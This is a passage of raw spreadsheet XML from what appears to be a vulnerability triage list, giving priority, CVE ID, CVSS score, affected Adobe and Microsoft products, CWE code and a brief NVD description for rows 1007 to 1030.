adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1007" s="5" t="inlineStr" /><c r="M1007" s="5" t="inlineStr" /><c r="N1007" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1007" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1007" s="5" t="inlineStr" /><c r="Q1007" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1007" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1007" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81989</t></is></c></row><row r="1008"><c r="A1008" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1008" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1008" s="5" t="inlineStr"><is><t>CVE-2026-81990</t></is></c><c r="D1008" s="5" t="n"><v>7.8</v></c><c r="E1008" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1008" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1008" s="5" t="inlineStr" /><c r="H1008" s="5" t="n"><v>0.002</v></c><c r="I1008" s="5" t="inlineStr" /><c r="J1008" s="5" t="inlineStr" /><c r="K1008" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1008" s="5" t="inlineStr" /><c r="M1008" s="5" t="inlineStr" /><c r="N1008" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1008" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1008" s="5" t="inlineStr" /><c r="Q1008" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1008" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1008" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81990</t></is></c></row><row r="1009"><c r="A1009" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1009" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1009" s="5" t="inlineStr"><is><t>CVE-2026-81992</t></is></c><c r="D1009" s="5" t="n"><v>7.8</v></c><c r="E1009" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1009" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1009" s="5" t="inlineStr" /><c r="H1009" s="5" t="n"><v>0.002</v></c><c r="I1009" s="5" t="inlineStr" /><c r="J1009" s="5" t="inlineStr" /><c r="K1009" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1009" s="5" t="inlineStr" /><c r="M1009" s="5" t="inlineStr" /><c r="N1009" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1009" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1009" s="5" t="inlineStr" /><c r="Q1009" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1009" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1009" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81992</t></is></c></row><row r="1010"><c r="A1010" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1010" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1010" s="5" t="inlineStr"><is><t>CVE-2026-82005</t></is></c><c r="D1010" s="5" t="n"><v>7.8</v></c><c r="E1010" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1010" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1010" s="5" t="inlineStr" /><c r="H1010" s="5" t="n"><v>0.002</v></c><c r="I1010" s="5" t="inlineStr" /><c r="J1010" s="5" t="inlineStr" /><c r="K1010" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L1010" s="5" t="inlineStr" /><c r="M1010" s="5" t="inlineStr" /><c r="N1010" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1010" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1010" s="5" t="inlineStr" /><c r="Q1010" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R1010" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1010" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t></is></c></row><row r="1011"><c r="A1011" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1011" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1011" s="5" t="inlineStr"><is><t>CVE-2026-82006</t></is></c><c r="D1011" s="5" t="n"><v>7.8</v></c><c r="E1011" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1011" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1011" s="5" t="inlineStr" /><c r="H1011" s="5" t="n"><v>0.002</v></c><c r="I1011" s="5" t="inlineStr" /><c r="J1011" s="5" t="inlineStr" /><c r="K1011" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L1011" s="5" t="inlineStr" /><c r="M1011" s="5" t="inlineStr" /><c r="N1011" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1011" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1011" s="5" t="inlineStr" /><c r="Q1011" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1011" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1011" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t></is></c></row><row r="1012"><c r="A1012" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1012" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1012" s="5" t="inlineStr"><is><t>CVE-2026-82007</t></is></c><c r="D1012" s="5" t="n"><v>7.8</v></c><c r="E1012" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1012" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1012" s="5" t="inlineStr" /><c r="H1012" s="5" t="n"><v>0.002</v></c><c r="I1012" s="5" t="inlineStr" /><c r="J1012" s="5" t="inlineStr" /><c r="K1012" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L1012" s="5" t="inlineStr" /><c r="M1012" s="5" t="inlineStr" /><c r="N1012" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1012" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1012" s="5" t="inlineStr" /><c r="Q1012" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R1012" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1012" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t></is></c></row><row r="1013"><c r="A1013" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1013" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1013" s="5" t="inlineStr"><is><t>CVE-2026-83498</t></is></c><c r="D1013" s="5" t="n"><v>7.8</v></c><c r="E1013" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1013" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1013" s="5" t="inlineStr" /><c r="H1013" s="5" t="n"><v>0.003</v></c><c r="I1013" s="5" t="inlineStr" /><c r="J1013" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1013" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1013" s="5" t="inlineStr" /><c r="M1013" s="5" t="inlineStr" /><c r="N1013" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1013" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1013" s="5" t="inlineStr" /><c r="Q1013" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R1013" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1013" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t></is></c></row><row r="1014"><c r="A1014" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1014" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1014" s="5" t="inlineStr"><is><t>CVE-2026-83942</t></is></c><c r="D1014" s="5" t="n"><v>7.8</v></c><c r="E1014" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1014" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1014" s="5" t="inlineStr" /><c r="H1014" s="5" t="n"><v>0.002</v></c><c r="I1014" s="5" t="inlineStr" /><c r="J1014" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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014" s="5" t="inlineStr" /><c r="M1014" s="5" t="inlineStr" /><c r="N1014" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1014" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1014" s="5" t="inlineStr" /><c r="Q1014" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1014" s="5" t="inlineStr"><is><t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1014" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t></is></c></row><row r="1015"><c r="A1015" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1015" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1015" s="5" t="inlineStr"><is><t>CVE-2026-83952</t></is></c><c r="D1015" s="5" t="n"><v>7.8</v></c><c r="E1015" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1015" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1015" s="5" t="inlineStr" /><c r="H1015" s="5" t="n"><v>0.002</v></c><c r="I1015" s="5" t="inlineStr" /><c r="J1015" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1015" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1015" s="5" t="inlineStr" /><c r="M1015" s="5" t="inlineStr" /><c r="N1015" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1015" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1015" s="5" t="inlineStr" /><c r="Q1015" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1015" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1015" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t></is></c></row><row r="1016"><c r="A1016" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1016" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1016" s="5" t="inlineStr"><is><t>CVE-2026-83954</t></is></c><c r="D1016" s="5" t="n"><v>7.8</v></c><c r="E1016" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1016" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1016" s="5" t="inlineStr" /><c r="H1016" s="5" t="n"><v>0.003</v></c><c r="I1016" s="5" t="inlineStr" /><c r="J1016" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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16" s="5" t="inlineStr" /><c r="M1016" s="5" t="inlineStr" /><c r="N1016" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1016" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1016" s="5" t="inlineStr" /><c r="Q1016" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1016" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1016" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t></is></c></row><row r="1017"><c r="A1017" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1017" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1017" s="5" t="inlineStr"><is><t>CVE-2026-83955</t></is></c><c r="D1017" s="5" t="n"><v>7.8</v></c><c r="E1017" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1017" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1017" s="5" t="inlineStr" /><c r="H1017" s="5" t="n"><v>0.002</v></c><c r="I1017" s="5" t="inlineStr" /><c r="J1017" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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17" s="5" t="inlineStr" /><c r="M1017" s="5" t="inlineStr" /><c r="N1017" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1017" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1017" s="5" t="inlineStr" /><c r="Q1017" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1017" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1017" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t></is></c></row><row r="1018"><c r="A1018" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1018" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1018" s="5" t="inlineStr"><is><t>CVE-2026-83959</t></is></c><c r="D1018" s="5" t="n"><v>7.8</v></c><c r="E1018" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1018" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1018" s="5" t="inlineStr" /><c r="H1018" s="5" t="n"><v>0.002</v></c><c r="I1018" s="5" t="inlineStr" /><c r="J1018" s="5" t="inlineStr" /><c r="K1018" s="5" t="inlineStr"><is><t>adobe:substance_3d_sampler</t></is></c><c r="L1018" s="5" t="inlineStr" /><c r="M1018" s="5" t="inlineStr" /><c r="N1018" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1018" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1018" s="5" t="inlineStr" /><c r="Q1018" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1018" s="5" t="inlineStr"><is><t>Substance3D - Sampler is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1018" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83959</t></is></c></row><row r="1019"><c r="A1019" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1019" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1019" s="5" t="inlineStr"><is><t>CVE-2026-83967</t></is></c><c r="D1019" s="5" t="n"><v>7.8</v></c><c r="E1019" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1019" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1019" s="5" t="inlineStr" /><c r="H1019" s="5" t="n"><v>0.003</v></c><c r="I1019" s="5" t="inlineStr" /><c r="J1019" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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19" s="5" t="inlineStr" /><c r="M1019" s="5" t="inlineStr" /><c r="N1019" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1019" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1019" s="5" t="inlineStr" /><c r="Q1019" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1019" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1019" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t></is></c></row><row r="1020"><c r="A1020" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1020" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1020" s="5" t="inlineStr"><is><t>CVE-2026-83968</t></is></c><c r="D1020" s="5" t="n"><v>7.8</v></c><c r="E1020" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1020" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1020" s="5" t="inlineStr" /><c r="H1020" s="5" t="n"><v>0.003</v></c><c r="I1020" s="5" t="inlineStr" /><c r="J1020" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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0" s="5" t="inlineStr" /><c r="M1020" s="5" t="inlineStr" /><c r="N1020" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1020" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1020" s="5" t="inlineStr" /><c r="Q1020" s="5" t="inlineStr"><is><t>CWE-400, CWE-416</t></is></c><c r="R1020" s="5" t="inlineStr"><is><t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1020" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t></is></c></row><row r="1021"><c r="A1021" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1021" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1021" s="5" t="inlineStr"><is><t>CVE-2026-83969</t></is></c><c r="D1021" s="5" t="n"><v>7.8</v></c><c r="E1021" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1021" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1021" s="5" t="inlineStr" /><c r="H1021" s="5" t="n"><v>0.002</v></c><c r="I1021" s="5" t="inlineStr" /><c r="J1021" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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1" s="5" t="inlineStr" /><c r="M1021" s="5" t="inlineStr" /><c r="N1021" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1021" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1021" s="5" t="inlineStr" /><c r="Q1021" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1021" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1021" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t></is></c></row><row r="1022"><c r="A1022" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1022" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1022" s="5" t="inlineStr"><is><t>CVE-2026-83970</t></is></c><c r="D1022" s="5" t="n"><v>7.8</v></c><c r="E1022" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1022" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1022" s="5" t="inlineStr" /><c r="H1022" s="5" t="n"><v>0.003</v></c><c r="I1022" s="5" t="inlineStr" /><c r="J1022" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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2" s="5" t="inlineStr" /><c r="M1022" s="5" t="inlineStr" /><c r="N1022" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1022" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1022" s="5" t="inlineStr" /><c r="Q1022" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1022" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1022" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t></is></c></row><row r="1023"><c r="A1023" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1023" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1023" s="5" t="inlineStr"><is><t>CVE-2026-83971</t></is></c><c r="D1023" s="5" t="n"><v>7.8</v></c><c r="E1023" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1023" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1023" s="5" t="inlineStr" /><c r="H1023" s="5" t="n"><v>0.003</v></c><c r="I1023" s="5" t="inlineStr" /><c r="J1023" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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3" s="5" t="inlineStr" /><c r="M1023" s="5" t="inlineStr" /><c r="N1023" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1023" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1023" s="5" t="inlineStr" /><c r="Q1023" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1023" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1023" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t></is></c></row><row r="1024"><c r="A1024" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1024" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1024" s="5" t="inlineStr"><is><t>CVE-2026-83972</t></is></c><c r="D1024" s="5" t="n"><v>7.8</v></c><c r="E1024" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1024" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1024" s="5" t="inlineStr" /><c r="H1024" s="5" t="n"><v>0.003</v></c><c r="I1024" s="5" t="inlineStr" /><c r="J1024" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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4" s="5" t="inlineStr" /><c r="M1024" s="5" t="inlineStr" /><c r="N1024" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1024" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1024" s="5" t="inlineStr" /><c r="Q1024" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1024" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1024" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t></is></c></row><row r="1025"><c r="A1025" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1025" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1025" s="5" t="inlineStr"><is><t>CVE-2026-83973</t></is></c><c r="D1025" s="5" t="n"><v>7.8</v></c><c r="E1025" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1025" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1025" s="5" t="inlineStr" /><c r="H1025" s="5" t="n"><v>0.003</v></c><c r="I1025" s="5" t="inlineStr" /><c r="J1025" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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5" s="5" t="inlineStr" /><c r="M1025" s="5" t="inlineStr" /><c r="N1025" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1025" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1025" s="5" t="inlineStr" /><c r="Q1025" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1025" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1025" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t></is></c></row><row r="1026"><c r="A1026" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1026" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1026" s="5" t="inlineStr"><is><t>CVE-2026-83974</t></is></c><c r="D1026" s="5" t="n"><v>7.8</v></c><c r="E1026" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1026" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1026" s="5" t="inlineStr" /><c r="H1026" s="5" t="n"><v>0.002</v></c><c r="I1026" s="5" t="inlineStr" /><c r="J1026" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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6" s="5" t="inlineStr" /><c r="M1026" s="5" t="inlineStr" /><c r="N1026" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1026" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1026" s="5" t="inlineStr" /><c r="Q1026" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1026" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1026" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t></is></c></row><row r="1027"><c r="A1027" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1027" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1027" s="5" t="inlineStr"><is><t>CVE-2026-83975</t></is></c><c r="D1027" s="5" t="n"><v>7.8</v></c><c r="E1027" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1027" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1027" s="5" t="inlineStr" /><c r="H1027" s="5" t="n"><v>0.003</v></c><c r="I1027" s="5" t="inlineStr" /><c r="J1027" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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7" s="5" t="inlineStr" /><c r="M1027" s="5" t="inlineStr" /><c r="N1027" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1027" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1027" s="5" t="inlineStr" /><c r="Q1027" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1027" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1027" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t></is></c></row><row r="1028"><c r="A1028" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1028" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1028" s="5" t="inlineStr"><is><t>CVE-2026-83976</t></is></c><c r="D1028" s="5" t="n"><v>7.8</v></c><c r="E1028" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1028" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1028" s="5" t="inlineStr" /><c r="H1028" s="5" t="n"><v>0.002</v></c><c r="I1028" s="5" t="inlineStr" /><c r="J1028" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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8" s="5" t="inlineStr" /><c r="M1028" s="5" t="inlineStr" /><c r="N1028" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1028" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1028" s="5" t="inlineStr" /><c r="Q1028" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1028" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1028" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t></is></c></row><row r="1029"><c r="A1029" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1029" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1029" s="5" t="inlineStr"><is><t>CVE-2026-83977</t></is></c><c r="D1029" s="5" t="n"><v>7.8</v></c><c r="E1029" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1029" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1029" s="5" t="inlineStr" /><c r="H1029" s="5" t="n"><v>0.003</v></c><c r="I1029" s="5" t="inlineStr" /><c r="J1029" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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29" s="5" t="inlineStr" /><c r="M1029" s="5" t="inlineStr" /><c r="N1029" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1029" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1029" s="5" t="inlineStr" /><c r="Q1029" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1029" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1029" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t></is></c></row><row r="1030"><c r="A1030" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1030" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1030" s="5" 